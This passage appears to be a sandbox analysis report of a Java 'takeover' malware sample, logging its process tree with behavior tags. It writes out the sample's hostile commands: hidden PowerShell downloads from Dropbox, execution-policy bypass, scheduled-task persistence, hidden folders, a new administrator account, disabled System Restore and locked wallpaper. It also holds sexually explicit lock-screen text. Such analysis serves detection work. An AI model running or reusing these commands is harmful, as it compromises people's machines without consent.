PID 2476 wrote to memory of 4352	2476	java.exe	137
PID 2476 wrote to memory of 4352	2476	java.exe	137
PID 4352 wrote to memory of 4632	4352	net.exe	139
PID 4352 wrote to memory of 4632	4352	net.exe	139
PID 2476 wrote to memory of 348	2476	java.exe	140
PID 2476 wrote to memory of 348	2476	java.exe	140
PID 348 wrote to memory of 2496	348	net.exe	142
PID 348 wrote to memory of 2496	348	net.exe	142

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3120	attrib.exe
4172	attrib.exe

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Slut-SNAPSHOT.jar
1⤵
- Drops startup file
- Loads dropped DLL
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\SYSTEM32\icacls.exe
  icacls "C:/ProgramData/slut/" /grant Users:F
  2⤵
  - Modifies file permissions
  PID:1300
- C:\Windows\SYSTEM32\icacls.exe
  icacls "C:/ProgramData/slutBat/" /grant Users:F
  2⤵
  - Modifies file permissions
  PID:2896
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s +h -r C:/ProgramData/slut
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:4172
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s +h -r C:/ProgramData/slutBat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:3120
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /delete /tn UpdateslutFiles /F
  2⤵
  PID:2244
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /tn UpdateslutFiles /tr "C:\ProgramData\slutBat\updateFiles.vbs" /sc hourly /mo 2 /st 09:14
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3248
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d "c:\ProgramData\slut\wallpaper.jpg" /f
  2⤵
  - Modifies registry key
  PID:4808
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 0x00000001 /f
  2⤵
  - Modifies registry key
  PID:3224
- C:\Windows\SYSTEM32\REG.exe
  REG ADD "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "2" /f
  2⤵
  PID:1532
- C:\Windows\SYSTEM32\REG.exe
  REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v WallpaperStyle /t REG_SZ /d "2" /f
  2⤵
  PID:3732
- C:\Windows\SYSTEM32\REG.exe
  REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WallpaperEngine /f
  2⤵
  - Modifies registry key
  PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\slutBat\updateFiles.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/u9blgzv9sgym9aqmb2xnz/ABRiJrnxs33SHnlzqkJWBJI?rlkey=n0me9dg1p2lscfwspetihkq61&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5008
- - C:\Windows\system32\tar.exe
    tar -xf "C:/ProgramData/slut/files.zip"
    3⤵
    PID:5792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -windowstyle hidden -file "C:/ProgramData/slutBat/powershell.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5868
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2cjtusgn\2cjtusgn.cmdline"
      4⤵
      PID:5820
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10E3.tmp" "c:\Users\Admin\AppData\Local\Temp\2cjtusgn\CSC1FC98129927545CA943ACED7CAEBA2A2.TMP"
        5⤵
        
        PID:6124
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /ve /f
  2⤵
  - Modifies registry key
  PID:1492
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImagePath /t REG_SZ /d "c:\ProgramData\slut\lockScreen.jpg" /f
  2⤵
  - Modifies registry key
  PID:3712
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImageUrl /t REG_SZ /d "c:\ProgramData\slut\lockScreen.jpg" /f
  2⤵
  - Modifies registry key
  PID:1876
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /v LockScreenImageStatus /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:4228
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Accent /v AccentColorMenu /t REG_DWORD /d 0x00cbc0ff /f
  2⤵
  - Modifies registry key
  PID:3368
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\insert.wav" /f
  2⤵
  - Modifies registry key
  PID:2632
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\insert.wav" /f
  2⤵
  - Modifies registry key
  PID:1228
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\eject.wav" /f
  2⤵
  - Modifies registry key
  PID:1408
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\eject.wav" /f
  2⤵
  - Modifies registry key
  PID:2296
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\WindowsUAC\.Default /ve /t REG_SZ /d "c:\ProgramData\slut\default.wav" /f
  2⤵
  - Modifies registry key
  PID:2196
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKCU\AppEvents\Schemes\Apps\.Default\WindowsUAC\.Current /ve /t REG_SZ /d "c:\ProgramData\slut\default.wav" /f
  2⤵
  - Modifies registry key
  PID:1292
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "This PC is claimed by ||CENSORED||" /f
  2⤵
  - Modifies registry key
  PID:2564
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Thank you for running the Slut app! You hereby confirm you are a needy slut and submit your pc to any changes I deem fit. You will see latex porn, cocks cumming, pathetic sluts being tormented and there is nothing you can do about it. And don't forget to thank me~!" /f
  2⤵
  - Modifies registry key
  PID:4036
- C:\Windows\SYSTEM32\net.exe
  net user /delete Censored
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user /delete Censored
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1428
- C:\Windows\SYSTEM32\net.exe
  net user /add Censored 12characters
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user /add Censored 12characters
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\net.exe
  net localgroup administrators Censored /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators Censored /add
    3⤵
    PID:2496
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start https://twitter.com/intent/tweet?text=I%20clicked%20a%20dangerous%20file%20and%20now%20%40sw_takeover%20has%20taken%20over%20my%20pc%20%F0%9F%92%9C%0A%0AI'm%20just%20a%20silly%20slut%20that%20can't%20think%20of%20anything%20but%20porn%20%F0%9F%92%9C%F0%9F%92%9C%0A%0Ahttps%3A%2F%2Ftwitter.com%2Fsw_takeover
  2⤵
  PID:1628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/intent/tweet?text=I%20clicked%20a%20dangerous%20file%20and%20now%20%40sw_takeover%20has%20taken%20over%20my%20pc%20%F0%9F%92%9C%0A%0AI'm%20just%20a%20silly%20slut%20that%20can't%20think%20of%20anything%20but%20porn%20%F0%9F%92%9C%F0%9F%92%9C%0A%0Ahttps%3A%2F%2Ftwitter.com%2Fsw_takeover
    3⤵
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:1444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffd816ff208,0x7ffd816ff214,0x7ffd816ff220
      4⤵
      PID:3392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:11
      4⤵
      PID:2716
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2152,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:2
      4⤵
      PID:4844
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:13
      4⤵
      PID:4612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3408,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:1
      4⤵
      PID:3372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:1
      4⤵
      PID:2024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4088,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:1
      4⤵
      PID:3552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4132,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:1
      4⤵
      PID:3020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4072,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:9
      4⤵
      PID:4224
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4224,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:9
      4⤵
      PID:1648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:14
      4⤵
      PID:3200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3632,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:14
      4⤵
      PID:4952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=4360,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:1
      4⤵
      PID:3140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:14
      4⤵
      PID:1424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:14
      4⤵
      PID:3680
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5408,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14
      4⤵
      PID:6132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:14
      4⤵
      PID:6140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:14
      4⤵
      PID:5204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1128
        5⤵
        
        PID:5536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6092,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6496 /prefetch:1
      4⤵
      PID:5156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6344,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:14
      4⤵
      PID:5228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6328,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6516 /prefetch:14
      4⤵
      PID:400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7316,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=7340 /prefetch:1
      4⤵
      PID:5452
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7160,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:14
      4⤵
      PID:3248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6220,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:14
      4⤵
      PID:4808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7580,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=7576 /prefetch:14
      4⤵
      PID:4352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7744,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=7756 /prefetch:14
      4⤵
      PID:348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7592,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=7924 /prefetch:14
      4⤵
      PID:5700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7904,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=8020 /prefetch:14
      4⤵
      PID:5928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8096,i,11120986535933103618,17087419288469826988,262144 --variations-seed-version --mojo-platform-channel-handle=8144 /prefetch:1
      4⤵
      PID:5940
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v UseDefaultTile /t REG_DWORD /d 0x00000001 /f
  2⤵
  - Modifies registry key
  PID:4976
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /delete /tn slutMovieFile /F
  2⤵
  PID:440
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /tn slutMovieFile /tr "C:\ProgramData\slutBat\video.bat" /sc daily /mo 1 /sd 11/11/2023 /st 20:37
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1288
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Extensions\.webm /v Permissions /t REG_DWORD /d 1 /f
  2⤵
  PID:3476
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Extensions\.webm /v Runtime /t REG_DWORD /d 1 /f
  2⤵
  PID:2664
- C:\Windows\SYSTEM32\REG.exe
  REG ADD "HKCU\Software\Microsoft\MediaPlayer\Preferences" /v "ModeLoop" /t REG_DWORD /d 1 /f
  2⤵
  PID:5128
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:5144
- C:\Windows\SYSTEM32\REG.exe
  REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:5176
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k start https://ko-fi.com/sw_takeover
  2⤵
  PID:5188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ko-fi.com/sw_takeover
    3⤵
    PID:5484
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Don't forget to thank me <3.')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5448

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4080

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd8a2bdcf8,0x7ffd8a2bdd04,0x7ffd8a2bdd10
  2⤵
  PID:5836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1956,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2220,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2232 /prefetch:11
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
